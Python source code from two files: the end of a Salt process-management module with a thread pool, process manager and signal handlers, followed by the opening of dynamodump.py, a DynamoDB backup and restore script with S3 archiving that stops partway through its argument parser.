os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in self._process_map:
os.kill(pid, signal)
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.debug('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
# if anyone is done after
for pid in self._process_map:
try:
os.kill(signal.SIGKILL, pid)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __init__(self, *args, **kwargs):
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
multiprocessing.util.Finalize(self, salt.log.setup.shutdown_multiprocessing_logging, exitpriority=16)
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
multiprocessing.util.register_after_fork(self, SignalHandlingMultiprocessingProcess.__setup_signals)
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
exit(0)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
dynamodump.py | #!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(METADATA_URL + "placement/availability-zone",
data=None, timeout=5).read().decode()
aws_region = azone[:-1]
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
if profile:
session = boto3.Session(profile_name=profile)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service, region_name=aws_region)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile, region, "sts")
dynamo = _get_aws_client(profile, region, "dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator("list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile, region, "s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except botocore.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile, region, "s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except botocore.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except botocore.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(table_name,
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
scanFilter=None
if args.dateFilterField and args.dateFilterSince:
since = datetime.datetime.strptime(args.dateFilterSince, '%Y-%m-%d').strftime('%FT%TZ')
until = datetime.datetime.now().strftime('%FT%TZ')
if args.dateFilterUntil:
until = datetime.datetime.strptime(args.dateFilterUntil, '%Y-%m-%d').strftime('%FT%TZ')
scanFilter = {
args.dateFilterField: {
"ComparisonOperator": "BETWEEN",
"AttributeValueList": [
{"S": since},
{"S": until}
]
}
}
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
scanned_table = dynamo.scan(table_name,
scan_filter=scanFilter,
exclusive_start_key=last_evaluated_key)
except ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
while True:
try:
dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
else:
# update provisioned capacity
if not args.skipThroughputUpdate and int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(destination_table,
global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if (e.body["__type"] ==
"com.amazonaws.dynamodb.v20120810#LimitExceededException"):
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif (e.body["__type"] ==
"com.amazon.coral.availability#ThrottlingException"):
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
